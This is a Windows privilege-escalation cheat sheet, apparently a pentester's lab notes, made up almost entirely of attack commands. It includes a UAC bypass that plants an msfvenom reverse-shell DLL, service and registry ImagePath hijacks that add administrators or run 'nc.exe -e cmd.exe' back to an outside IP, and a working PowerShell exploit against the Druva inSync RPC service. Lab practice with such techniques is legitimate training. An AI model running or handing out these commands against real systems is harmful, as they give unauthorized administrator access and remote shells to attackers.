OS Attacks

User Account Control (UAC)

Confirming UAC Enabled

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA

Checking UAC Level (When Enabled)

 REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin

https://github.com/hfiref0x/UACME

Bypassing UAC (Method)

# Checking Path Variable
cmd /c echo %PATH%

# Generate Reverse Shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=8443 -f dll > srrstr.dll

# Test Reverse Shell
rundll32 shell32.dll,Control_RunDLL C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll

# Execute UAC
C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe

Weak Permissions

Weak Permission Audit

https://github.com/GhostPack/SharpUp/

.\SharpUp.exe audit

Manually Permission Check

icals <filepath>

1 Replace Service Bin Path

sc config WindscribeService binpath="cmd /c net localgroup administrators htb-student /add"

2 Restart Service

sc start WindscribeService

Unquoted Service Path

Find Unquoted Service Paths

wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

Check Weak Service ACL (Accessschk.exe)

accesschk.exe /accepteula "mrb3n" -kvuqsw hklm\System\CurrentControlSet\services

Modify Image-Path

Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443"

Vulnerable Services

Gather Installed Programs

wmic product get name

Gather Running Service

get-service | ? {$_.DisplayName -like 'Druva*'}

PoC

$ErrorActionPreference = "Stop"

$cmd = "net user htb-student /add"

$s = New-Object System.Net.Sockets.Socket(
    [System.Net.Sockets.AddressFamily]::InterNetwork,
    [System.Net.Sockets.SocketType]::Stream,
    [System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect("127.0.0.1", 6064)

$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd");
$length = [System.BitConverter]::GetBytes($command.Length);

$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command)

PreviousWindows Privesc NextWindows User Privileges

Last updated 1 year ago